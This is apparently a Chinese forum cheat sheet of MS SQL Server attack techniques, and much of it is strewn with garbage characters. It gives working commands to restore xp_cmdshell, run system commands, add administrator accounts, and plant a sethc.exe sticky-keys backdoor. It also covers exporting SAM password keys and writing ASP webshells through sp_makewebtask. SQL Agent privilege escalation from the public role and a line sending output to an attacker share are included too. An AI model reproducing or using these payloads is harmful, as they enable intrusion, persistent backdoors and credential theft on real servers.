XP_CMDSHELL恢复方法大全

admin

1 未能找到存储过程'master..xpcmdshell'.  EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
  h1 z1 ^( K9 w, D, s, T8 X# T恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
/ A, j6 o, ]% x/ G' h2 w$ y恢复方法：查询分离器连接后,
5 `+ O; ?6 F' D4 f3 D第一步执行：EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
第二步执行：EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

3 J) h4 V7 Q- G) l) k* w5 j3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'      
' z; g! r4 o: g2 d4 K; l然后按F5键命令执行完毕

4 终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
3 u5 l$ X# j! c- d查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'

- X5 u6 a' w) g7 |! P7 N" uxp或2003server系统:
* s# g& H7 o; m* F
+ x+ @- [8 N8 @+ Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'

: c4 P* v, k( G7 r' g1 z4 J, S- mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'

0 e1 r( e1 {" L: P4 d
/ O5 i! j. H! y4 m五个SHIFT
1 R! W1 x  l3 b1 \declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
( p, @# _# ]! I
! D" s. S8 v' y2 r5 u& I. Z0 Uxp_cmdshell执行命令另一种方法
1 y$ N# p, g4 d+ G7 ?' O9 w6 rdeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
1 e0 c3 @/ m' R6 a% y$ g7 Q7 a
6 h2 y6 w  E9 E, O判断存储扩展是否存在
/ e, q5 q3 v7 P. m0 ^- }. T% `% e# RSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

2 L& B9 A' Q) s* Q0 ?# I9 ^
, e7 ]  y: I- s6 X/ z5 l上传xplog70.dll恢复xp_cmdshell语句:
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'


. y3 G/ b$ s/ p: z& P
首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
; u2 I+ g8 `. }1 \6 S+ I8 a5 D" H
* P8 O$ v, }2 J: C然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
" Q" N1 E' A6 l' o5 T0 d返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1--  发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
% w/ i6 t5 Z8 w) a7 r, {

8 q; q# V6 t3 i( ]9 j7 P
; Y( o* G0 p# |, |  @. H恢复过程sp_addextendedproc 如下：
/ o2 W5 L8 L/ z' Q! _$ x* P" pcreate procedure sp_addextendedproc --- 1996/08/30 20:13
! d" ~5 w& p2 d" A; S( f@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
7 O# g  W! a$ `* I2 @4 \as
: e7 Y( K, _5 Tset implicit_transactions off
% t3 S1 o1 q+ T% Qif @@trancount > 0
, O6 y5 V7 Z7 `. c& P+ [3 `begin
2 v1 x6 L9 ^2 a% Q0 k: j) |) |( Wraiserror(15002,-1,-1,'sp_addextendedproc')
7 j# ]# p2 I2 R( l) Y; qreturn (1)
end
: T9 |# [: |6 L. x& g' Y4 ~dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO

" U0 k  d% a/ F0 `# W" y. I2 G. R: p# |
$ w% @7 j3 `- t' v$ T- v
0 j0 F5 S. I% ^+ [& G3 A2 m导出管理员密码文件
+ _2 B$ |/ X; e3 Y% v2 x& Q1 tsa默认可以读sam键.应该。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
- J0 G* O6 B. |' z2 O+ `# M用administrator登陆.
* q. x: v- H6 s用完机器后
reg import c:\test.reg
根本不用克隆.
, C  w/ T. g& u7 q! K* N找到对应的sid.


' b# W* ~7 Q" U1 z( z
恢复所有存储过程
+ q3 b0 b' u3 T6 Vuse master
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
* ?9 f* m: O+ y3 ?' Y  m7 Y1 K1 lexec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
; u" ~6 i, \8 |+ ~exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
4 A1 L4 I+ i% ]& X( \- pexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
5 ]% w7 @7 G8 r' G1 b: Fexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
) h. Z% R' s& X& l$ p: R7 lexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
' i1 J! w9 A3 ]( f# u# Dexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
  y+ ^# x6 [- z: uexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
! n' W& v! X) O; H4 N  p+ w
7 |8 T1 N4 ^0 i# N
建立读文件的存储过程
$ _. L' H: z8 Q: {) q# }# q6 t! G0 h7 z& LCreate proc sp_readTextFile @filename sysname
2 t# U" }( V+ C* pas

    begin
6 P2 b5 b8 E$ }    set nocount on
0 y. q5 j! Y! |6 N    Create table #tempfile (line varchar(8000))
0 K" N% \; t* K' m; x    exec ('bulk insert #tempfile from "' + @filename + '"')
    select * from #tempfile
    drop table #tempfile
End
, p9 ^: n. w, J) X+ d. g4 _" v  u
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
: G+ V3 C$ X, T- t0 m查看登录用户
  A. L& R, }. vSelect * from sysxlogins

把文件内容读取到表中
BULK INSERT tmp from "c:\test.txt"
; c1 h0 E* w, @0 u! HdElete from 表名 清理表里的内容
4 L3 \! B) f2 u2 ^% V/ D5 pcreate table b_test(fn nvarchar(4000));建一个表,字段为fn


3 g* Z2 V" D/ D0 c4 m加sa用户
exec master.dbo.sp_addlogin user,pass;
+ o& b4 x: R1 E; ]+ m9 j% `) oexec master.dbo.sp_addsrvrolemember user,sysadmin


' ?! L0 e  C) f5 g
读文件代码
, Z% \; ?% X" Z+ _$ N8 ideclare @o int, @f int, @t int, @ret int
9 b8 z0 R2 t. H) ~1 J& ~% rdeclare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
" j" U' D3 B6 c3 t3 T) Iexec @ret = sp_oamethod @f, 'readline', @line out
6 c- }9 A8 x5 O& [while( @ret = 0 )
! ~5 O3 r% C* T. n# F" B( y% Pbegin
; \$ q6 z: _/ ?4 y3 {2 |print @line
$ k7 E( m8 c/ F/ n, f* |exec @ret = sp_oamethod @f, 'readline', @line out
end

1 q  S( N, }+ ?$ x2 ^% G8 y
写文件代码：
$ D0 ~! x, {) p2 @5 n6 mdeclare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
6 }2 x5 @' n; d% lexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
" t' _( a. Q2 Y8 ~

1 Q: C3 v1 B$ M6 Z  U添加lake2 shell
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
0 U0 x- m. }; Q( N  Z  k1 A' Osp_dropextendedproc xp_lake2
( P; e$ B$ P1 |- _. W  mEXEC xp_lake2 'net user'

2 p7 b$ l( k, B  C+ M  t
8 ^* \, T' }) w! {- `* d/ }得到硬盘文件信息
--参数说明:目录名,目录深度,是否显示文件
1 b1 [: O) R4 [execute master..xp_dirtree 'c:'
/ |$ X2 x6 \9 a8 Lexecute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1


读serv-u配置信息
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
2 L7 K, f  }3 T' oexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'

通过xp_regwrite写SHIFT后门
0 P. k$ x( n( c- U0 g) Zexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

7 f* ?9 N- k% ?( B& H
/ Z9 g$ V+ j% w1 @3 q8 t4 Q
1 c( x* K1 p* t& M  O. c找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了

EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'


: {( ^  \, v- R5 `# L$ k- U3 _6 U6 b
! n5 W8 ?8 Y' q; c( M2 D1 ysql server 2005下开启xp_cmdshell的办法
7 l/ \; ~( Y, C/ f8 u9 N& [
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
- {6 L. x' `6 w$ `
' D) C, d; k" X! g  ESQL2005开启'OPENROWSET'支持的方法：

; E9 [3 [3 ]4 W" @exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
- X1 o; H: ?0 L; v
  C* u1 o( u' ^! {* q$ ESQL2005开启'sp_oacreate'支持的方法:
9 s2 m# l: W+ G: c4 r! i7 e
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;


% }" c6 U. Z7 U- F


9 G- o5 w3 J/ {1 P* A$ T! y* [
" f8 S+ i- ?& u; {2 Z1 K5 m0 }
& I. f) ~6 ?( b% Y% g1 {9 l
, R$ [' a+ i8 X, c! T
, a3 f/ h6 P& c' i; R" f4 P' _
8 m- _' j. j; I, N
' H0 q/ r- b9 S, v  F
/ p' A; I- G/ @5 N





( ^" r& B! }* ~- N3 L
( T6 D4 E, [( N9 l

1 P8 @" V% s" R5 ~" Y7 w


! K. ]6 `6 m& K( K3 J以下方面不知道能不能成功暂且留下研究哈:
4)
use msdb; --这儿不要是master哟
exec sp_add_job @job_name= czy82 ;
6 e' j. q. i5 A; |; [7 rexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
exec sp_start_job @job_name= czy82 ;
, D( Y0 K5 o9 ^+ V$ D% ?- W
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql，后面的我们就可以
3 o1 t% V2 W9 x# C4 G8 }执行tsql语句了.
' G7 G5 t+ c1 e: `5 O; _: e0 A对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
8 V: q& Z) y3 F0 c, C( M- T0 i; W$ ~第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
net start SQLSERVERAGENT
& j9 @2 a6 Q" M4 l/ s# i
) @# Z) j4 e- f' z对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
USE msdb
EXEC sp_add_job @job_name = GetSystemOnSQL ,
@enabled = 1,
5 m: S( ]& f* m@description = This will give a low privileged user access to
# e) p# W6 ^* k7 q6 q3 }" z( cxp_cmdshell ,
@delete_level = 1
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
@step_name = Exec my sql ,
) C' z+ F+ {# l$ ~@subsystem = TSQL ,
  x4 }: h0 e5 S( J8 E@command = exec master..xp_execresultset N select exec
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
% Z3 O# K5 x' S( l3 h* g: iEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
$ c4 i' k/ g6 j9 V& @/ k@server_name = 你的SQL的服务器名
' Y: u- f* w# g8 REXEC sp_start_job @job_name = GetSystemOnSQL
* {3 M1 v! t; e% z! g
. p; [' F0 n5 \2 K9 _2 |# ]# V+ N不要怀疑上面的代码，我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
. Y# W, N* ]- E$ j6 ]才让我们可以以public执行xp_cmdshell

1 P: j+ s$ n  V, T+ D5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
8 ~1 \9 o8 g; L3 x4 n5 \: s3 H/ h- H在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968

  t+ b0 {+ f8 e; N7 @! Z& F3 lUSE msdb
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
* H6 Z0 f: L! Z8 x1 i3 o@enabled = 1,
@description = This will create a file called c:\sqlafc123.txt ,
: P3 D2 |1 ?: X  K; Z@delete_level = 1
+ n1 b0 m4 ?, u+ H/ x- T/ fEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
" c1 `1 e3 a, o3 Y@step_name = SQLAFC ,
@subsystem = TSQL ,
@command = select hello, this file was created by the SQL Agent. ,
@output_file_name = c:\sqlafc123.txt
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
( X" \/ Y4 C$ K; K9 e! s! k@server_name = SERVER_NAME
EXEC sp_start_job @job_name = ArbitraryFilecreate

7 ]# U1 |' ?& G- s5 i& r如果subsystem选的是:tsql，在生成的文件的头部有如下内容
6 s: k* N3 X8 E- _  b( h9 P1 I
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
4 S9 e- r  E3 X/ `----------------------------------------------
5 L1 M8 `3 Q. w, a' W7 T$ Yhello, this file was created by the SQL Agent.
* ]$ t0 E$ B8 A& d
8 e9 B; I4 t6 K  j# P& s(1 ?????)

所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
% P$ }* p/ Q% {# I' u1 f4 ]命令的vbs文件到启动目录!

5 s, ?# o( P! J$ }5 b) i6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
关于sp_MScopyscriptfile 看下面的例子
% J& I) f3 Q8 d6 Ydeclare @command varchar(100)
declare @scripfile varchar(200)
5 M& `% m9 ^/ rset concat_null_yields_null off
select @command= dir c:\ > "\\attackerip\share\dir.txt"
7 a7 _( Z7 ^% H) Tselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
4 [( o6 i7 B$ Jexec sp_MScopyscriptfile @scripfile ,
! S8 f8 Q  e, b( j7 c/ z
这两个东东都还在测试试哟
8 r! |- `; r5 s8 m让MSSQL的public用户得到一个本机的web shell

sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
--@query= select <img src=vbscript:msgbox(now())>
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
@query= select
+ J. W6 {; a1 P0 G9 w<%On Error Resume Next
# e: J$ v- o; R: F; `Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
* s7 D) K5 c* X" l* tszTempFile = "C:\" & oFileSys.GetTempName()
+ E6 |( ?( \2 K! G, J: N: ~8 s) g# T: fCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
, U, W" g! z3 q# t* R/ m+ t3 H/ cSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
3 U8 d) _7 W9 Q6 ^3 V7 r3 E1 x<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="OST">
: x/ [- d. f" s<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
" l# y, u+ S7 g1 j& z& H# P, @6 v5 Y</FORM><RE>
<% If (IsObject(oFile))Then
On Error Resume Next
7 w" V3 n) S7 h8 z; P( ^  YResponse.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
% V* q; X0 A2 t+ eCall oFileSys.deleteFile(szTempFile, True)
End If%>
9 J$ T, ]# J) ?& R/ U  D. F7 C</BODY></HTML>
+ S+ u! X4 ~- d+ [